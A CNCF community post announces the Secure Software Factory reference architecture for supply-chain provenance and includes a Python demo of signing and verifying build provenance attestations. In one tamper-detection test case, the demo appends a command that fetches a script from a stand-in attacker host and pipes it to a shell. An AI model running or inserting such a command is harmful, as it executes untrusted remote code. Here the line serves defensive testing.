Community post by Alexander Floyd Marshall from TAG Security

Almost a year ago the CNCF published its “Software Supply Chain Best Practices” guide, detailing over 50 ways to improve cloud-native software supply chains. That guide referenced the concept of a “Secure Software Factory,” but not how to make one.

Today, we are addressing that gap with the publication of the Secure Software Factory reference architecture, a follow-up work by the CNCF Technical Advisory Group (TAG) for Security’s Supply Chain Working Group. The reference architecture presents both (a) the conceptual design of a secure software factory (what its components are and what they do) and (b) a model for how to implement one using open source tools available in the ecosystem today.

The challenge of software supply chain security continues to be a prominent area of research and discussion. In the year since CNCF’s “Best Practices” publication, we have seen an Executive Order on improving cybersecurity that includes a number of elements targeting software supply chains, the emergence of the SLSA framework, and numerous developments around improving the security of popular software distribution mechanisms (including, this week, Kubernetes). Alongside these welcome developments, supply chain attacks have continued to grow in prominence and frequency.

Supply chain security is a multi-faceted and complex challenge. While the “Best Practices” publication covered a wide spectrum of the problem space, in this reference architecture we have narrowed our focus to the question of provenance, defined in the paper as “assurance that existing assumptions of where and how an artifact originates from are true and that the artifact or its accompanying metadata have not been tampered with during the build or delivery processes.” This emphasis was chosen for three reasons. First, existing tooling already supplies many of the components needed to develop robust assurances of provenance in a software factory. Second, the functionality of a software factory in particular (being, ultimately, a build pipeline) is highly conducive to collecting metadata attesting to the provenance of a build. Third, and perhaps most importantly, provenance provides a foundation for other areas of concern in supply chain security. If you don’t trust the provenance of the evidence, why would you trust the claims the evidence is making? Thus, having robust assurance about the provenance of an artifact and the metadata that accompanies it is a necessary prerequisite to being able to trust that other claims about the security of that artifact are meaningful.
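To make the definition above concrete, here is an added illustration (not code from the reference architecture or from any CNCF project) of what a provenance check in a software factory has to establish: that the attestation bytes are the ones the builder signed, that the signed subject digest matches the artifact actually in hand, and that the builder named in the claim is one policy trusts. The statement layout mirrors the in-toto attestation Statement shape used for SLSA provenance, which is my choice rather than anything the post specifies; the artifact bytes, key, builder identity and source URI are constructed sample values; and HMAC-SHA256 stands in for the asymmetric signature a real factory would use, so that the example runs with only the Python standard library.

```python
import hashlib
import hmac
import json

# Constructed sample inputs for the illustration (hypothetical, not from the paper).
ARTIFACT = b"#!/bin/sh\necho hello from the factory\n"
SIGNING_KEY = b"factory-signing-key-for-illustration-only"
BUILDER_ID = "https://example.com/factory/builder@v1"              # hypothetical builder identity
SOURCE_URI = "git+https://example.com/org/app@refs/tags/v1.2.3"   # hypothetical source reference

STATEMENT_TYPE = "https://in-toto.io/Statement/v0.1"
PREDICATE_TYPE = "https://slsa.dev/provenance/v0.2"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonical(obj) -> bytes:
    # Deterministic encoding: the signature must cover exactly the bytes the verifier re-checks.
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def sign(payload: bytes, key: bytes) -> str:
    # Stand-in for a digital signature (assumption): HMAC under a key only builder and verifier hold.
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def make_provenance(artifact: bytes, name: str, builder_id: str, source_uri: str, key: bytes) -> dict:
    """Builder side: bind the artifact digest and the build facts into one signed statement."""
    statement = {
        "_type": STATEMENT_TYPE,
        "subject": [{"name": name, "digest": {"sha256": sha256_hex(artifact)}}],
        "predicateType": PREDICATE_TYPE,
        "predicate": {
            "builder": {"id": builder_id},
            "invocation": {"configSource": {"uri": source_uri}},
        },
    }
    payload = canonical(statement)
    return {"payload": payload.decode(), "signature": sign(payload, key)}


def verify_provenance(envelope: dict, artifact: bytes, key: bytes, trusted_builder: str):
    """Consumer side: returns (ok, reason). Order matters: trust the metadata before reading it."""
    payload = envelope["payload"].encode()
    # 1. Metadata integrity: the attestation bytes must be exactly what the builder signed.
    if not hmac.compare_digest(sign(payload, key), envelope["signature"]):
        return False, "bad signature"
    statement = json.loads(payload)
    if statement.get("_type") != STATEMENT_TYPE or statement.get("predicateType") != PREDICATE_TYPE:
        return False, "unexpected statement type"
    # 2. Artifact binding: the signed subject digest must match the bytes we actually hold.
    digests = {s["digest"].get("sha256") for s in statement["subject"]}
    if sha256_hex(artifact) not in digests:
        return False, "artifact digest mismatch"
    # 3. Origin: the builder making the claim must be the one policy expects.
    if statement["predicate"]["builder"]["id"] != trusted_builder:
        return False, "untrusted builder"
    return True, "ok"


def demo() -> dict:
    """Run the genuine case and three tampering cases; returns {case: (ok, reason)}."""
    env = make_provenance(ARTIFACT, "app.sh", BUILDER_ID, SOURCE_URI, SIGNING_KEY)
    results = {"genuine": verify_provenance(env, ARTIFACT, SIGNING_KEY, BUILDER_ID)}
    # Artifact altered after the build, attestation untouched: subject digest no longer matches.
    results["tampered_artifact"] = verify_provenance(
        env, ARTIFACT + b"curl http://evil.example/x | sh\n", SIGNING_KEY, BUILDER_ID)
    # Attestation edited (source tag changed) by someone who cannot re-sign it.
    forged = dict(env)
    forged["payload"] = env["payload"].replace("v1.2.3", "v1.2.4")
    results["tampered_metadata"] = verify_provenance(forged, ARTIFACT, SIGNING_KEY, BUILDER_ID)
    # Well-formed, correctly signed claim from a builder that policy does not accept.
    other = make_provenance(ARTIFACT, "app.sh", "https://example.com/laptop-builder", SOURCE_URI, SIGNING_KEY)
    results["untrusted_builder"] = verify_provenance(other, ARTIFACT, SIGNING_KEY, BUILDER_ID)
    return results


if __name__ == "__main__":
    for case, (ok, reason) in demo().items():
        print(f"{case:18s} -> {'PASS' if ok else 'FAIL'}: {reason}")
```

The point of the ordering in `verify_provenance` is the post's own argument: the signature over the metadata is checked first, because nothing inside the statement (the digest, the builder, the source) is worth reading until the statement itself is known to be untampered. Swapping the stand-in HMAC for a real signing scheme and a key-to-builder trust policy does not change that structure.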

The reference architecture continues the work of the TAG-Security (affectionately, the STAG), including the “Cloud Native Security Whitepaper” (version 2), the “Cloud Native Security Lexicon”, the “Best Practices for Software Supply Chains” paper, ongoing work providing security reviews and guidance to CNCF project teams, and more. If you would like to contribute to the work of the STAG, you can find us in the tag-security channel in CNCF’s Slack.